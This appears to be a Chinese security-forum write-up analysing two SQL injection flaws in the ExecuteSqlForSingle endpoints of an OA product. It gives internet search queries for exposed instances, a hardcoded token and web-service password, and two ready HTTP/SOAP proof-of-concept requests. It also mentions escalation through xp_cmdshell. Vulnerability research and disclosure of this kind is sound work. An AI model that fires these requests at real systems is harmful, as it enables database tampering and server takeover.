问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
某宝oa软件两处-ExecuteSqlForSingle注入分析与复现
漏洞分析
最近,看到运营小姐姐发了篇某宝的ExecuteSqlForSingle注入漏洞,想着去分析一下,结果一下找到两个同名接口都存在注入。。。。
一、漏洞描述 ------ 此漏洞由于鉴权令牌硬编码,导致可直接在前台进行sql注入,支持堆叠注入,进而执行任意sql命令。导致数据库可被任意增删改查,甚至可以打开xp\_cmdshell,进而获取服务器权限 二、网络测绘 ------ fofa: ```js app="顶讯科技-易宝OA系统" ``` data:image/s3,"s3://crabby-images/aa734/aa734797243b88961a3835094235f08694953118" alt="图片.png" hunter: ```js web.body="topvision_oaName" ``` data:image/s3,"s3://crabby-images/cceaf/cceafd37abe637e65b12c3a81997de85c72fb840" alt="图片.png" 三、漏洞分析 ------ 1、使用文件搜索工具在项目内搜索关键字ExecuteSqlForSingle data:image/s3,"s3://crabby-images/c8711/c8711c3fa98bb1c3c8b42c184451d9af7ab7375c" alt="图片.png" 2、搜出来\\manager\\bin\\TopVision.WebApi.XML 文件中,存在两处接口 ```js M:TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle(System.String,System.String,System.String) M:TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle(System.String,System.String,System.String) ``` 3、使用dnSpy工具反编译\\manager\\bin\\TopVision.WebApi.dll data:image/s3,"s3://crabby-images/4f570/4f5700aee67877652ea0b7aafc3784a49b789203" alt="图片.png" 4、先看第一个接口TopVision.WebApi.Areas.Api.Controllers.systemController.ExecuteSqlForSingle data:image/s3,"s3://crabby-images/c4ef9/c4ef91d799fdbbfb5eb89d843ae935ffcdba77ce" alt="图片.png" 5、请求方式为post,入参token、sql、strParameters。第一步if (base.IsAuthorityCheck() \\== null)会先校验token,跟进IsAuthorityCheck方法查看,发现token硬编码为zxh: data:image/s3,"s3://crabby-images/e2535/e2535e2ca48ad8cb62e7bd331cdb617205601089" alt="图片.png" 6、回到ExecuteSqlForSingle方法,三个入参最终会走到SingleBase<systemService>.Instance.ExecuteSqlForSingle中,跟进看代码: data:image/s3,"s3://crabby-images/57282/57282482df9765cfdde9569af55f7ac706da3043" alt="图片.png" 7、sql和strParameters会先走到GetExecuteSqlForStoreProcedure方法,跟进后,发现此方法必须要求sql字符以usp\_、Usp\_、USP\_开头,或者值为SCM\_SE\_GetSystemSalesTips,此处不符合注入条件: data:image/s3,"s3://crabby-images/a3de0/a3de07416e49e49b3dd9b47892f9ee81f95bad2e" alt="图片.png" 8、回到第6步的代码,最终还会走到ExecuteScalarSQLToObject方法中,可控入参只有sql,为第二个形参,跟进看代码发现又直接传入ExecuteScalar方法,sql对应形参strSQL: data:image/s3,"s3://crabby-images/3561f/3561f58b3329a87e216ad7a21b0cc07c181bed9a" alt="图片.png" data:image/s3,"s3://crabby-images/65d27/65d277162768c09905d8eb7fe3495016b7280abd" alt="图片.png" 9、再次跟进代码,再次进入ExecuteScalar方法,参数传递为strSQL->cmdText data:image/s3,"s3://crabby-images/e3349/e3349a0a7de84eb12843f7b00c81d4c41d7ed504" alt="图片.png" 10、cmdText又会传入SqlHelper.PrepareCommand方法, data:image/s3,"s3://crabby-images/34a46/34a46d5001680a1ede67f3341b33e45376c23777" alt="图片.png" 11、最终回到第9步的 sqlCommand.ExecuteScalar进行sql执行: data:image/s3,"s3://crabby-images/6de33/6de33ecdbc6630c6a01ef453055a99622e2b954a" alt="图片.png" 12、因此注入点即为参数sql处,可直接执行sql参数的值,poc如下: ```js POST /api/system/ExecuteSqlForSingle HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded token=zxh&sql=select @@version&strParameters= ``` 13、接着第二个接口TopVision.WebApi.WebService.BasicService.ExecuteSqlForSingle data:image/s3,"s3://crabby-images/3c378/3c3787abaf4ab284d27f8151e36db8a32afb7c59" alt="图片.png" 14、首先会校验webservicePassword,进入GetWebServicePassword查看 data:image/s3,"s3://crabby-images/0da07/0da07631ad541e530242274b2a4eeb22ca0faad1" alt="图片.png" 15、发现是从配置中读取WebServicePassword,于是打开web.config,搜索WebServicePassword值: data:image/s3,"s3://crabby-images/57846/578469144ab0195ea7b33185ae745335ae2c3305" alt="图片.png" 16、三个参数会进入GetExecuteSqlForStoreProcedure方法,跟进查看代码,发现也有if校验sql的值,无用: data:image/s3,"s3://crabby-images/46ed4/46ed4d7e798042ac7b2063e56c68da182a544e3a" alt="图片.png" 17、回到15步代码,sql参数再次传入ExecuteScalarSQL方法: data:image/s3,"s3://crabby-images/f8002/f80021dcb4d106e680830f7c7fb80bf8ab838ac0" alt="图片.png" 18、而此方法正是 第9步的方法,开始步骤重合,后续分析同理,于是,第二个poc: ```js POST /WebService/BasicService.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/ExecuteSqlForSingle" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ExecuteSqlForSingle xmlns="http://tempuri.org/"> <sql>select @@version</sql> <strParameters></strParameters> <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword> </ExecuteSqlForSingle> </soap:Body> </soap:Envelope> ``` 四、漏洞复现 ------ poc1: ```js POST /api/system/ExecuteSqlForSingle HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded token=zxh&sql=select @@version&strParameters= ``` data:image/s3,"s3://crabby-images/852dd/852ddd77491cdeb95ec6e1070262afdfd99e2f61" alt="图片.png" poc2: ```js POST /WebService/BasicService.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://tempuri.org/ExecuteSqlForSingle" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ExecuteSqlForSingle xmlns="http://tempuri.org/"> <sql>select @@version</sql> <strParameters></strParameters> <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword> </ExecuteSqlForSingle> </soap:Body> </soap:Envelope> ``` data:image/s3,"s3://crabby-images/0f159/0f159a47e306f3488c31511cfd49bc82db4e2a69" alt="图片.png"
发表于 2024-08-26 09:30:02
阅读 ( 3885 )
分类:
OA产品
0 推荐
收藏
0 条评论
请先
登录
后评论
dddtest
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!